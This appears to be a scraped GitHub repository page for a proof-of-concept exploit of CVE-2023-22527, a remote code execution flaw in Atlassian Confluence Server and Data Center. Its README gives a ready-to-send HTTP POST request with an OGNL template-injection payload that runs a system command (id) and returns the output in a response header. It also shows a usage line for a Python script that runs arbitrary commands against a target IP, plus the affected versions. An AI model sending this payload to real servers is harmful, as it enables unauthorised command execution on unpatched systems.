CVE-2023-22527

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

Poc

POST /template/aui/text-inline.vm HTTP/1.1
Host: 192.168.31.3:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 287

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

用法

python CVE-2023-22527.py --target http://36.1.40.134:8090 --cmd "whoami"

影响范围

Atlassian Confluence 8.0.x 8.1.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3

引用

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
source		source
CVE-2023-22527.py		CVE-2023-22527.py
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

source

source

CVE-2023-22527.py

CVE-2023-22527.py

README.md

README.md

Repository files navigation

CVE-2023-22527

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

Poc

用法

影响范围

引用

About

Releases

Packages

Languages

adminlove520/CVE-2023-22527

Folders and files

Latest commit

History

Repository files navigation

CVE-2023-22527

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

Poc

用法

影响范围

引用

About

Resources

Stars

Watchers

Forks

Languages